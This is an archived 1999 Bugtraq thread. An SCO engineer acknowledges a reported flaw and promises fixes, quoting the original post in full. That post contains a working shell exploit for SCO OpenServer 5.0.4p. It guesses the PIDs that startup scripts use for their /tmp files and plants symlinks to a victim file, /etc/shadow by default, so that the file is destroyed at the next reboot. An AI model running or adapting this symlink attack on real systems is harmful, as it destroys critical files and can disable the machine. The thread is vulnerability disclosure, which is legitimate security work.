Leshka, We have started work on this and are checking all of our OS products to see if they suffer from similar problems. We will make information available at our security pages http://www.sco.com/security) on how to work around the problem, and will also have fixes available in a few days. Thanks, Jon > -----Original Message----- > From: Bugtraq List [mailto:BUGTRAQat_private]On Behalf Of leshka > Sent: 07 March 1999 12:07 > To: BUGTRAQat_private > Subject: Little exploit for startup scripts (SCO 5.0.4p). > > > #!/bin/sh > # > # ... The punishment for inobedience ... > # (Cycle # 2) > # > # This simple script can help to erase any file > # (SCO OpenServer Enterprise System v 5.0.4p). > # Have fun ! > # > # > # > # > # Some of "/etc/rc2.d" startup scripts create and then delete > temporary files > # with easily predictable names in "/tmp" directory. Below > there is a few > # interesting fragments of those nice scripts: > # > # S84rpcinit: > # ... > # /bin/su root -c "/bin/ps -ef" > /tmp/rpc$$ 2>/tmp/rpc.err$$ > # /bin/rm -f /tmp/rpc.err$$ > # ... > # rm -rf /tmp/rpc$$ > # > # S95nis: > # ... > # /bin/su root -c "/bin/ps -ef" > /tmp/nis$$ 2>/tmp/nis.err$$ > # /bin/rm -f /tmp/nis.err$$ > # ... > # rm -f /tmp/nis$$ > # > # S85tcp: > # ... > # /bin/su root -c "/bin/ps -ef" > /tmp/tps$$ 2>/tmp/ps.err$$ > # /bin/rm -f /tmp/ps.err$$ > # ... > # /bin/rm -f /tmp/tps$$ > # > # S89nfs: > # ... > # /bin/su root -c "/bin/ps -ef" > /tmp/nfs$$ 2>/tmp/nfs.err$$ > # /bin/rm -f /tmp/nfs.err$$ > # ... > # rm -f /tmp/nfs$$ > # > # Every time during the startup such shell scripts creates files with names > # that include a process number of the above shell script. My numerous tests > # showed that the number is always the same with every reboot. Pretty good, > # isn't it? One problem: how to determine the process number of such script? > # It's so simple! Child processes of this script have PID's with values > # slightly over than the parent's PID. A little math and one gets it. Next > # step is creating a few symbolic links to the victime file in the "/tmp" > # directory. During the next startup the victim file will be destroyed. > # > # P.S. Looking forward to getting published a complete SCO's list of names > # of such perfect shell scripts. > # > # 999,99*2 > # > # ---------------------- > # --------------------------------------------- > # ----------------- Dedicated to my beautiful lady > ------------------ > # --------------------------------------------- > # ---------------------- > # > # Leshka Zakharoff, 1999. E-mail: leshkaat_private (.ru) > # > # > # > if [ _$1 = "_" ] > then > { > echo -n "File to delete [/etc/shadow]:" > read victim_file > if [ _$victim_file = "_" ] > then > victim_file="/etc/shadow" > fi > } > else > victim_file=$1 > fi > pid=`/bin/ps -ef|/bin/grep -v awk|/usr/bin/awk '/inetd/ { printf $2 }'` > lastpid=`expr $pid - 30` > while [ $pid != $lastpid ] > do > pid=`expr $pid - 1`;ln -fs /etc/shadow /tmp/tps$pid > done > echo Done ! File \"$victim_file\" will be destroyed after the next reboot. > ---- Jon Coyle - Manager, Internet Engineering & Secure Technologies joncoat_private SCO Ltd. Tel : +44 1923 813656 Croxley Business Park Fax: +44 1923 813804 Hatters Lane http://www.sco.com Watford, WD1 8YN, UK Fingerprint: F44A 677A 4920 02AC C655 D419 B9B7 46B0 A951 6FF7
This archive was generated by hypermail 2b30 : Fri Apr 13 2001 - 14:38:14 PDT